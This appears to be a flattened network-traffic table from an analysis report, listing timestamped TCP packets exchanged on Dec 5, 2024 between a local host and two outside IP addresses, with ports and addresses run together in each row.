                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.662384033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.662440062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.663237095 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.663496017 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.663548946 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.664170980 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.664217949 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.664671898 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.664717913 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.665102005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.665148020 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.665705919 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.666053057 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.666531086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.666546106 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.666570902 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.666594982 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.666958094 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.667001963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.667042971 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.667944908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.667968035 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.667988062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.668009043 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.668833017 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.668971062 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.669007063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.669825077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.670069933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.670109034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.671356916 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.671392918 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.671458006 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.671489954 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.671942949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.671977043 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.672003984 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.672033072 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.672729015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.672765017 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.672812939 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.672842979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.673862934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.673902035 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.673929930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.674005985 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.674818993 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.674874067 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.674886942 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.674916029 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.675498009 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.675543070 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.675555944 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.675585032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.676282883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.676330090 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.676340103 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.676368952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.677192926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.677252054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.677360058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.677391052 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.678570986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.678827047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.678879976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.679111004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.679155111 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.679172039 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.679203033 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.680011988 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.680061102 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.680066109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.680089951 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.680924892 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.680974960 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.681058884 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.681101084 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.681889057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.682018995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.682063103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.682822943 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.682869911 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.683022976 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.683059931 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.683732986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.683778048 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.683957100 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.683995962 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.684655905 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.684695959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.684725046 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.684752941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.685687065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.685735941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.685905933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.686645031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.686691999 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.687099934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.687148094 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.687413931 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.687453985 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.687566042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.687598944 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.688385010 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.688437939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.688528061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.688560009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.689383984 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.689415932 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.689419031 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.689445972 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.690216064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.690396070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.690433979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.691154003 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.691189051 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.691220999 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.691248894 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.692141056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.692173958 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.692193985 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.692222118 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.693011999 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.693056107 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.693165064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.693195105 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.693945885 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.694190025 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.694227934 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.694886923 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.694921970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.695462942 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.695497036 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.695806980 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.695841074 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.695858955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.695892096 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.696716070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.696737051 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.696749926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.696769953 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.697432995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.697469950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.697534084 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.697683096 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.698309898 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.698424101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.698458910 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.699326038 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.699364901 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.699636936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.699675083 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.700248957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.700289011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738127947 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738157988 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738172054 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738214970 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738559008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738617897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738637924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738660097 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.738675117 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.739461899 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.739542961 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.739554882 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.739590883 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.740411043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.740492105 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.740504980 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.740530968 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.740545988 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.741421938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.741444111 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.741456032 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.741491079 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.742351055 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.742427111 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.742439985 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.742460012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.742475986 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.743273020 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.743340015 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.743351936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.743375063 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.744271040 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.744353056 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.744365931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.744389057 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.744416952 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.745398045 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.745445967 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.745457888 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.745484114 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.746248960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.746294975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.746306896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.746329069 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.746351004 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.747122049 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.747184038 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.747195005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.747216940 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.748085022 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.748146057 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.748157978 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.748186111 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.748203039 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.749129057 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.749193907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.749209881 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.749232054 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.750039101 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.750148058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.750161886 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.750184059 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.750211000 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.793766022 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.798238039 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.843934059 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.843954086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.843990088 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.844029903 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.844423056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.844455004 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.844701052 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.844737053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.845208883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.845242977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.845365047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.845398903 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.846183062 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.846230030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.846483946 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.846559048 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.847218037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.847265959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.847354889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.847423077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.848189116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.848239899 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.848680973 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.848727942 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.848998070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.849082947 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.849524021 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.849567890 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.849894047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.849929094 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.850056887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.850087881 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.850872993 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.850923061 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.851125956 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.851340055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.851737022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.851783037 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.851996899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.852313042 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.852674007 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.852720022 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.853110075 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.853301048 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.853646994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.853701115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.854214907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.854260921 CET4979380192.168.2.11185.215.113.84
